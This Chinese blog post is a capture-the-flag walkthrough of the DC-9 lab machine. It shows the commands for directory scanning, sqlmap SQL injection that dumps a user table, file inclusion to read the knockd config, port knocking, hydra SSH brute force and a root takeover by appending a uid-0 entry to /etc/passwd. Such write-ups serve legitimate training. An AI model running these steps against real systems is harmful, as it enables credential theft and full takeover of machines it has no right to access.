<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="w我要出人头地，crazy！第一步还是常见的信息搜集">
<meta property="og:type" content="article">
<meta property="og:title" content="dc-9">
<meta property="og:url" content="http://example.com/2025/04/04/dc-9/index.html">
<meta property="og:site_name" content="jujub3">
<meta property="og:description" content="w我要出人头地，crazy！第一步还是常见的信息搜集">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/dc-9/1736851651514-f8b15749-e3e8-407c-812d-d62e7d5154d6.png">
<meta property="og:image" content="http://example.com/dc-9/1736851785245-01d86d67-6f58-4ad3-8bd4-739de3f3a8a9.png">
<meta property="og:image" content="http://example.com/dc-9/1736856770019-4e4cddac-0ce0-4572-8ad4-3b4bba30e71a.png">
<meta property="og:image" content="http://example.com/dc-9/1736856976337-e8c23c6e-616e-4979-a267-c3c760f15e50.png">
<meta property="og:image" content="http://example.com/dc-9/1736858030326-e2ebf08f-8d2e-4e96-8920-ce2c05eeb28d.png">
<meta property="og:image" content="http://example.com/dc-9/1736858878300-72f39259-1fcd-4e5c-b9b3-05d95f88bf2d.png">
<meta property="og:image" content="http://example.com/dc-9/1736858949920-049d43d5-b0c1-4c8a-bca8-7fec4edff063.png">
<meta property="og:image" content="http://example.com/dc-9/1736865143050-c5b28667-420e-447d-aa62-6327ea2a0d68.png">
<meta property="og:image" content="http://example.com/dc-9/1736865183510-1298dd61-47b2-436b-87c4-ef21a3ae4d5f.png">
<meta property="og:image" content="http://example.com/dc-9/1736865235122-4e7879c6-6bc7-4ab9-9cf3-d4b0892e72fa.png">
<meta property="og:image" content="http://example.com/dc-9/1736866174360-cbd3b9d8-9675-4c53-810a-8be914ba9401.png">
<meta property="og:image" content="http://example.com/dc-9/1736868174025-897a918d-f424-4fd3-96a7-515231608e2c.png">
<meta property="og:image" content="http://example.com/dc-9/1736907515881-ad1b1e6d-74c3-4b92-848a-d686cc5ce74e.png">
<meta property="og:image" content="http://example.com/dc-9/1736908396559-dfb69495-d91f-479c-ac82-141c4675dbc4.png">
<meta property="og:image" content="http://example.com/dc-9/1736909143288-9cb40c90-cc2b-4cc6-9294-909aed38bece.png">
<meta property="og:image" content="http://example.com/dc-9/1736915336406-665b4f0a-6373-47c4-9de1-7ebab78ca5eb.png">
<meta property="og:image" content="http://example.com/dc-9/1736916165248-0e223acb-ee6c-4728-8808-651d9026ba72.png">
<meta property="og:image" content="http://example.com/dc-9/1736919917179-d2224b72-eda6-45a6-921f-842a665bf6ff.png">
<meta property="og:image" content="http://example.com/dc-9/1736919889767-40499cb9-e6b8-4f55-9b28-a7fec60effcb.png">
<meta property="og:image" content="http://example.com/dc-9/1736926012324-29845c68-6e92-4b42-ad79-359e6ea1ff3e.png">
<meta property="og:image" content="http://example.com/dc-9/1736926201128-aa4d9047-72d5-4593-b9c8-b20bc82c1100.png">
<meta property="og:image" content="http://example.com/dc-9/1736926295239-abef5e4f-c1f0-4759-97bb-538b6d589f68.png">
<meta property="article:published_time" content="2025-04-04T09:40:04.000Z">
<meta property="article:modified_time" content="2025-04-04T09:42:14.380Z">
<meta property="article:author" content="jujub3">
<meta property="article:tag" content="DC">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/dc-9/1736851651514-f8b15749-e3e8-407c-812d-d62e7d5154d6.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/head.jpg" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/head.jpg">
        
      
    
    <!-- title -->
    <title>dc-9</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2025/04/04/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-Linux%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2025/04/04/dc-7/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/04/04/dc-9/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/04/04/dc-9/&text=dc-9"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/04/04/dc-9/&title=dc-9"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/04/04/dc-9/&is_video=false&description=dc-9"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=dc-9&body=Check out this article: http://example.com/2025/04/04/dc-9/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/04/04/dc-9/&title=dc-9"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/04/04/dc-9/&title=dc-9"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/04/04/dc-9/&title=dc-9"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/04/04/dc-9/&title=dc-9"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/04/04/dc-9/&name=dc-9&description=&lt;p&gt;w我要出人头地，crazy！第一步还是常见的信息搜集&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/04/04/dc-9/&t=dc-9"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        dc-9
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">jujub3</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-04-04T09:40:04.000Z" class="dt-published" itemprop="datePublished">2025-04-04</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/DC/" rel="tag">DC</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>w我要出人头地，crazy！第一步还是常见的信息搜集</p>
<span id="more"></span>

<p><img src="/../dc-9/1736851651514-f8b15749-e3e8-407c-812d-d62e7d5154d6.png" alt="img"></p>
<p><img src="/../dc-9/1736851785245-01d86d67-6f58-4ad3-8bd4-739de3f3a8a9.png" alt="img"></p>
<p>然后得到ip地址：192.168.166.136</p>
<p>然后进行常规的dirsearch目录扫描，这里为了清晰可以多加一个参数：-i 200</p>
<p>dirsearch -u 192.168.166.136 -i 200</p>
<p>表示只返回状态码为200的目录</p>
<p><img src="/../dc-9/1736856770019-4e4cddac-0ce0-4572-8ad4-3b4bba30e71a.png" alt="img"></p>
<p>然后访问web页面 ，找到一个搜索页面，可能与数据库进行交互，所以尝试sql注入<img src="/../dc-9/1736856976337-e8c23c6e-616e-4979-a267-c3c760f15e50.png" alt="img"></p>
<p>最后跑出来是存在sql注入的</p>
<p><img src="/../dc-9/1736858030326-e2ebf08f-8d2e-4e96-8920-ce2c05eeb28d.png" alt="img">	</p>
<p>然后就是查询数据库为：Staff</p>
<p><img src="/../dc-9/1736858878300-72f39259-1fcd-4e5c-b9b3-05d95f88bf2d.png" alt="img"></p>
<p>查询表</p>
<p><img src="/../dc-9/1736858949920-049d43d5-b0c1-4c8a-bca8-7fec4edff063.png" alt="img"></p>
<p>然后直接就dump这个表</p>
<p>sqlmap -r dc9.txt -D ‘Staff’ -T ‘Users’ –dump </p>
<p><img src="/../dc-9/1736865143050-c5b28667-420e-447d-aa62-6327ea2a0d68.png" alt="img"></p>
<p>最后拿去一个网站解密（推荐去国外的网站，高效）</p>
<p><img src="/../dc-9/1736865183510-1298dd61-47b2-436b-87c4-ef21a3ae4d5f.png" alt="img"></p>
<p>最后得到一个密码：</p>
<p>transorbital1</p>
<p>成功登录 <img src="/../dc-9/1736865235122-4e7879c6-6bc7-4ab9-9cf3-d4b0892e72fa.png" alt="img"></p>
<p>最后因为那个file does not exist猜测，存在文件包含漏洞</p>
<p><img src="/../dc-9/1736866174360-cbd3b9d8-9675-4c53-810a-8be914ba9401.png" alt="img"></p>
<p>因为除了admin这个数据库还有一个user这个数据库，里面包含了一些用户的账号和密码。所以直接也把它dump出来</p>
<p><img src="/../dc-9/1736868174025-897a918d-f424-4fd3-96a7-515231608e2c.png" alt="img">	</p>
<p>然后将得到的username和password导入到两个文件中</p>
<p>导入账号：</p>
<p>awk -F ‘|’ ‘NR &gt; 3 {print $6}’ data.txt | sed ‘s&#x2F;^ *&#x2F;&#x2F;;s&#x2F; *$&#x2F;&#x2F;‘ &gt; usernames.txt </p>
<p>导入密码：</p>
<p>awk -F ‘|’ ‘NR &gt; 3 {print $4}’ data.txt | sed ‘s&#x2F;^ *&#x2F;&#x2F;;s&#x2F; *$&#x2F;&#x2F;‘ &gt; passwords.txt</p>
<p>因为前面nmap搜集到的信息显示22端口是关闭的所以不能直接进行爆破</p>
<p><img src="/../dc-9/1736907515881-ad1b1e6d-74c3-4b92-848a-d686cc5ce74e.png" alt="img"></p>
<p>后面看到大佬的博客说，这里需要用到前面的文件包含漏洞，22端口不能访问的原因是因为存在knockd服务：<br>该服务通过动态的添加iptables规则来隐藏系统开启的服务，使用自定义的一系列号来敲门，使系统开启需要访问的端口，才能对外访问。不使用时，再使用自定义的序列号来关门，将端口关闭。不对外监听。进一步提升了服务和系统的安全。</p>
<p>默认的配置文件是：&#x2F;etc&#x2F;knockd.conf</p>
<p>于是利用文件包含找到了端口:7469,8475,9842</p>
<p><img src="/../dc-9/1736908396559-dfb69495-d91f-479c-ac82-141c4675dbc4.png" alt="img"></p>
<p>然后使用nmap按顺序扫描对应的端口就可以使用hydra进行爆破了</p>
<p>nmap 192.168.166.136 -p 7469</p>
<p>nmap 192.168.166.136 -p 8475</p>
<p>nmap 192.168.166.136 -p 9842</p>
<p>使用hydra爆破</p>
<p>hydra -L usernames.txt -P passwords.txt 192.168.166.136 ssh</p>
<p><img src="/../dc-9/1736909143288-9cb40c90-cc2b-4cc6-9294-909aed38bece.png" alt="img"></p>
<p>第一次只爆破出来了两个账号，但是第二次爆破出来了三个</p>
<p><img src="/../dc-9/1736915336406-665b4f0a-6373-47c4-9de1-7ebab78ca5eb.png" alt="img">	</p>
<p>然后发现janitor这个账户想对于其他两个账户多了一个文件夹，最后打开发现是一个密码文件，</p>
<p><img src="/../dc-9/1736916165248-0e223acb-ee6c-4728-8808-651d9026ba72.png" alt="img"></p>
<p>将这些密码加入到刚刚爆破的密码里，再进行一次爆破，出了一个新的账号</p>
<p><img src="/../dc-9/1736919917179-d2224b72-eda6-45a6-921f-842a665bf6ff.png" alt="img"></p>
<p>登进去，最后的话也是发现了一个py脚本</p>
<p><img src="/../dc-9/1736919889767-40499cb9-e6b8-4f55-9b28-a7fec60effcb.png" alt="img"></p>
<p>使用openssl生成密码。</p>
<p>openssl passwd -1 -salt 123 admin</p>
<p>123：盐值</p>
<p>admin：密码</p>
<p><img src="/../dc-9/1736926012324-29845c68-6e92-4b42-ad79-359e6ea1ff3e.png" alt="img"></p>
<p>然后将这个写进去：admin:$1$123$Ok9FhQy4YioYZeBPwQgm3&#x2F;:0:0:admin:&#x2F;root:&#x2F;bin&#x2F;bash</p>
<p>最后的话就是将这个写入&#x2F;etc&#x2F;passwd</p>
<p><img src="/../dc-9/1736926201128-aa4d9047-72d5-4593-b9c8-b20bc82c1100.png" alt="img"></p>
<p>最后切换admin用户，发现已经是root权限了。最后直接去&#x2F;root拿flag</p>
<p><img src="/../dc-9/1736926295239-abef5e4f-c1f0-4759-97bb-538b6d589f68.png" alt="img"></p>

  </div>
</article>

    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
    <div id="vcomments" class="blog-post-comments"></div>
    <script>
        new Valine({
            el: '#vcomments',
            visitor: true,
            appId: '0cD8XYS5aRoaPXBQ2dkwSoOI-gzGzoHsz',
            appKey: 'UD7mUoaxqx0jyMaDNVNDgTpN',
            placeholder: 'ヾﾉ≧∀≦)o来啊，快活啊!',
            avatar: 'robohash'
        })
    </script>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/tags/">标签</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/04/04/dc-9/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/04/04/dc-9/&text=dc-9"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/04/04/dc-9/&title=dc-9"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/04/04/dc-9/&is_video=false&description=dc-9"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=dc-9&body=Check out this article: http://example.com/2025/04/04/dc-9/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/04/04/dc-9/&title=dc-9"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/04/04/dc-9/&title=dc-9"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/04/04/dc-9/&title=dc-9"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/04/04/dc-9/&title=dc-9"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/04/04/dc-9/&name=dc-9&description=&lt;p&gt;w我要出人头地，crazy！第一步还是常见的信息搜集&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/04/04/dc-9/&t=dc-9"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2025
    jujub3
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
